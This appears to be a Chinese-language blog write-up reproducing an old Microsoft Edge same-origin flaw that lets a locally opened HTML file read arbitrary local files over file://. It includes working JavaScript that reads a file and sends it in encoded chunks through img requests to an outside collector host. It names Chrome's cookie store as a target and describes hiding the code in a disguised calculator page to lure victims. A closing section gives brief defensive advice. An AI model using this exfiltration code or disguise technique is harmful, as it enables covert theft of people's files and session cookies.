Microsoft Edge同源策略不严导致任意文件读取测试

edge.png

漏洞介绍

近期看到文章介绍，称Microsoft Edge对SOP同源策略处理存在问题，可导致任意文件泄露。
SOP同源策略是比较常见的，简单来说，在访问A域名时，如果B域名站点存在JS动作通过XHR请求了A域名网站下资源，该动作会被同源策略拒绝，因为它们非同源。
同源的判定标准是一个三元组，任意一个不同则判定不同源：协议、主机名、端口号

在浏览器中，可以使用file://协议来读取文件，攻击者如果想要读取到访问者的本地文件，由于http和file协议不同，不同源的情况下并不能做到。
但是这个限制在特定场景下就不存在了，如果恶意页面是保存在本地的文件，通过浏览器打开html文件，URL中协议就是file://，此时如果页面中存在XHR请求file://协议，该请求是符合同源要求的，可能导致本地文件读取。

复现测试

0x01 准备工作

尝试读取的本地文件：

txt.png

poc代码：

0x02 非Microsoft Edge浏览器测试

Chrome浏览器：提示同源策略请求只支持http,data,chrome,chrome-extension,https协议

chrome.png

fireforx浏览器：提示同源策略进制读取，CORS只能是http协议

firefox.png

ie11浏览器：提示拒绝访问

ie.png

0x03 Microsoft Edge浏览器测试

看到的文章中测试版本是Microsoft Edge 40.15063.0.0，这里测试使用的是比它更新的版本：

version.png

测试结果是：没有触发错误拦截信息，能够直接获取到本地文件内容：

edge1.png

相关拓展

0x01 任意数据外带

在测试中是仅仅对一个txt文件内容进行了读取，并将内容展示在页面中。

还可以读取其他浏览器存储的一些cookie信息，如：
Chrome的cookie信息一般在

C:/Users/${user}/AppData/Local/Google/Chrome/User Data/Default/Cookies

cookie.png

攻击者如果想要通过恶意页面，将本地的数据带出，也是轻而易举的。比如，可以在js中创建img标签，发起http请求攻击者的服务器，并且携带读取到的文件内容。

如果文件内容过长，get请求的URL会超长，还能对文件内容进行分割、间隔多次传输；
如果文件内容不仅是文本文字，或是图片等，还能通过各种编码进行包装传输（如encodeURI）：

let resultDiv = document.getElementById("result");
    let data = "";    
    let xhr= new XMLHttpRequest();    
    let limit = 1024
    xhr.open("GET","file://F:/AppServ/www/ctf/edge/edge.txt");    
    xhr.onreadystatechange= function () {    
        if(xhr.readyState==4) {    
            resultDiv.innerText = xhr.responseText;
            url =  "http://XXXXX.ceye.io/data/?data=";   
            // data = window.btoa(xhr.responseText);  
            data = encodeURI(xhr.responseText);  
            console.log(data.length)
            let st=setInterval(function(){
                img = document.createElement("img");
                if (data.length <= limit) {
                    if (data.length == 0) {
                        clearInterval(st)
                    }else {
                        img.src = url + data;
                        resultDiv.appendChild(img);
                        clearInterval(st)
                        console.log("A:"+data.length)
                    }
                } else {
                    temp = data.substr(0, limit);
                    data = data.substr(limit,data.length-1);
                    img.src = url + temp;
                    resultDiv.appendChild(img);
                    console.log("B:"+temp.length)
                } 
            },1000)
        }    
    }    
    xhr.send();

image.png

攻击者接收的数据段之一：

image1.png

0x02 隐藏伪装

造成任意文件内容泄露的JS代码本体并不大，可以隐藏在其他正常的下载页面中，在用户疏于防范的情况下隐蔽地执行；
结合社会工程等手段，可以更轻易地进行攻击利用。
例如，当下载一个用于学习html的网页，作者建议使用Microsoft Edge进行打开，你很可能会听从作者建议就运行查看效果

dir.png

calc.png

当页面功能显示正常，是一个计算器的网页，警惕心就没有了。
当你可能还沉浸在玩耍它的计算功能和学习源码的过程中时，攻击者想要的你本地文件内容可能已经被偷偷传走了

res.png

防护建议

1、不要随意打开不能确定是否存在危害的文件，包括html文件（先看一遍源代码）
2、使用解决了该问题的更新版本的Microsoft Edge
3、使用Chrome或者Firefox等浏览器